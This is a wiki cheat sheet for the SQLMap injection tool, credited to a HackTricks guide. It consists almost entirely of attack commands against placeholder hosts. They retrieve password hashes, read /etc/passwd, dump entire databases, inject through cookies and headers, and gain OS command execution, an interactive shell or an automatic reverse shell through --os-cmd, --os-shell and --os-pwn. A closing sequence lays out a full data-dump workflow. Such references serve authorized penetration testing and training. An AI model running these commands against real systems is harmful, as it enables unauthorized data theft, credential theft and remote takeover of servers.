Wiki
Powered by

# SQLMap

By
Adrien

Source: HackTricks SQLMap Guide

# 🔧 Basic Command Options 

-u "<URL>"                         # Target URL
-p "<PARAM>"                       # Parameter to test
--user-agent="SQLMAP"             # Custom User-Agent
--random-agent                    # Use a random User-Agent
--threads=10                      # Increase speed
--risk=3                          # Max risk (1-3)
--level=5                         # Max level (1-5)
--dbms="<KNOWN DB TECH>"          # Force specific DBMS
--os="<OS>"                       # Target OS
--technique="UB"                  # UNION and BLIND only
--batch                           # Non-interactive mode
--auth-type="Basic"               # Auth type (Basic, Digest, NTLM, PKI)
--auth-cred="admin:admin"         # Auth credentials
--proxy="http://127.0.0.1:8080"   # Route through Burp
--union-char="GsFRts2"            # Custom UNION char (rare cases)

# 📥 Information Gathering 

--current-user        # Current DB user
--is-dba              # Check if user is DBA
--hostname            # Hostname of server
--users               # List DB users
--passwords           # Retrieve hashed passwords
--privileges          # Show user privileges
--file-read=/etc/passwd  # Read file from server

# 🧱 Database Enumeration 

--all                            # Dump everything
--dump                           # Dump table entries
--dbs                            # List databases
--tables -D <DB>                 # Tables in DB
--columns -D <DB> -T <TABLE>     # Columns in table
-D <DB> -T <TABLE> -C <COL> --dump   # Dump specific column

# 📄 Request File (Burp)

Save the full request in a .txt file from Burp, then run:

sqlmap -r request.txt

# 🌐 Request Methods

# GET 

sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id

# POST 

sqlmap -u "http://example.com" --data "username=*&password=*"

# PUT 

sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

# 🍪 Cookie Injection 

sqlmap -u "http://example.com" --cookie="sessionid=*"

# 🧾 Custom Headers 

sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

# 💣 Command Execution 

# Run system command
sqlmap -u "http://example.com/?id=1" -p id --os-cmd whoami

# Interactive shell
sqlmap -u "http://example.com/?id=1" -p id --os-shell

# Auto-exploit with reverse shell
sqlmap -u "http://example.com/?id=1" -p id --os-pwn

# 🧙♂️ Tamper Scripts

Path on Kali: /usr/share/sqlmap/tamper

--tamper=between,randomcase

📚 Reference: Tamper Options

# 📊 LDTR - Logical Flow 

# 1. Discover databases
sqlmap -u "http://target.com?id=1" --dbs

# 2. Explore tables
sqlmap -u "http://target.com" -D <db_name> --tables

# 3. Identify common columns
sqlmap -u "http://target.com" -D <db_name> -T <table> --common-columns

# 4. Dump content
sqlmap -u "http://target.com" -D <db_name> -T <table> --dump

© Copyright 2025. All rights reserved.